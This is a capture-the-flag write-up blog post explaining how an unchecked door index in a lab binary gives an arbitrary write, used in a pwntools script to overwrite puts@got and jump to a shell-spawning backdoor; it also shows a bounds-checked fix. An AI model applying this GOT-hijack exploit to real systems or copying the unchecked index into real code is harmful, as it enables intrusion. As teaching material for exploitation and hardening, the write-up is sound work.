Pwn CTF doors Writeup

kazma, founder/president of the NCKU Cybersecurity Club

Exploitation

First, let's look at the binary's protections:

└─$ checksec doors
[*] '/home/kazma/doors'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

The program's main logic is simple:

int __fastcall main(int argc, const char **argv, const char **envp)
{
int input_num; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 canary; // [rsp+8h] [rbp-8h]

canary = __readfsqword(0x28u);
init();
puts("There are many doors.\nChoose one and enter the correct password than you will got the treasure !!");
printf("The door number you want to choose : ");
__isoc99_scanf("%d", &input_num);             // door index: signed, never range-checked
printf("Password : ");
__isoc99_scanf("%lld", (char *)&doors + 8 * input_num); // 8-byte write at doors + 8*index
puts("Oh no,password is wrong,try again ~");   // first call through the GOT after the write
return 0;
}

And a backdoor function:

int treasure()
{
return execve("/bin/sh", 0LL, 0LL);
}

Looking at the two user-controlled inputs, the first one (the door number) is used as an unchecked index, so it turns the second input (the password) into an arbitrary 8-byte write relative to `doors`. With that write we overwrite the GOT entry of `puts` (GOT hijacking) so that the next `puts` call jumps to `treasure`, which gives us RCE.
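The root cause is the missing range check on the door index. The following C snippet, written for this writeup and not part of the challenge binary, places the unchecked pattern next to a bounds-checked version; the array name and size (`doors`, `NUM_DOORS`) are assumptions chosen to mirror the decompiled code.

```c
#include <stdio.h>
#include <stddef.h>

#define NUM_DOORS 16

/* Constructed stand-in for the binary's global array: one 64-bit
 * "password" slot per door, laid out contiguously like the real `doors`. */
long long doors[NUM_DOORS];

/* Unchecked pattern from the decompiled main(): the index is used as-is,
 * so any int (including negative values) selects an arbitrary 8-byte slot
 * relative to `doors`. Kept only for contrast; never call it with an
 * out-of-range index. */
void store_password_unchecked(int idx, long long pw)
{
    doors[idx] = pw;
}

/* Hardened version: reject every index outside [0, NUM_DOORS).
 * Casting to size_t turns a negative idx into a huge unsigned value, so a
 * single comparison covers both the negative and the too-large case.
 * Returns 1 when the value was stored, 0 when the index was rejected. */
int store_password_checked(int idx, long long pw)
{
    if ((size_t)idx >= NUM_DOORS)
        return 0;
    doors[idx] = pw;
    return 1;
}

/* Demo with fixed inputs so it runs offline; the real program reads both
 * values with scanf, and a scanf return value of 1 should be checked too. */
int main(void)
{
    int probes[] = { 3, -1, NUM_DOORS, -4096 };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int ok = store_password_checked(probes[i], 0x41414141LL);
        printf("index %6d -> %s\n", probes[i], ok ? "stored" : "rejected");
    }
    return 0;
}
```

A negative index such as the one the exploit computes (the GOT of a no-PIE binary sits below `.bss`) is exactly what the `size_t` comparison rejects; using `unsigned` types for the index at the `scanf` call would not help on its own, because the distance to the GOT also fits in a large positive offset.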

Exploit

from pwn import *

p = process('./doors')
elf = ELF('./doors')

puts_got = elf.got['puts']          # GOT slot that puts() is called through
doors = elf.symbols['doors']        # base of the global array in .bss
treasure = elf.symbols['treasure']  # backdoor that execve()s /bin/sh

# Door index that makes doors + 8*idx land on puts@got. The GOT lies below
# .bss in this no-PIE binary, so idx is negative; scanf("%d") accepts it.
idx = (puts_got - doors) // 8

p.sendlineafter(": ", str(idx))        # "The door number you want to choose : "
p.sendlineafter(": ", str(treasure))   # "Password : " -> written into puts@got

p.interactive()                        # the following puts() call jumps to treasure

Pwned !!!

  • Title: Pwn CTF doors Writeup
  • Author: kazma
  • Created at: 2024-11-11 13:55:04
  • Updated at: 2024-11-11 19:56:13
  • Link: https://kazma.tw/2024/11/11/Pwn-CTF-doors-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.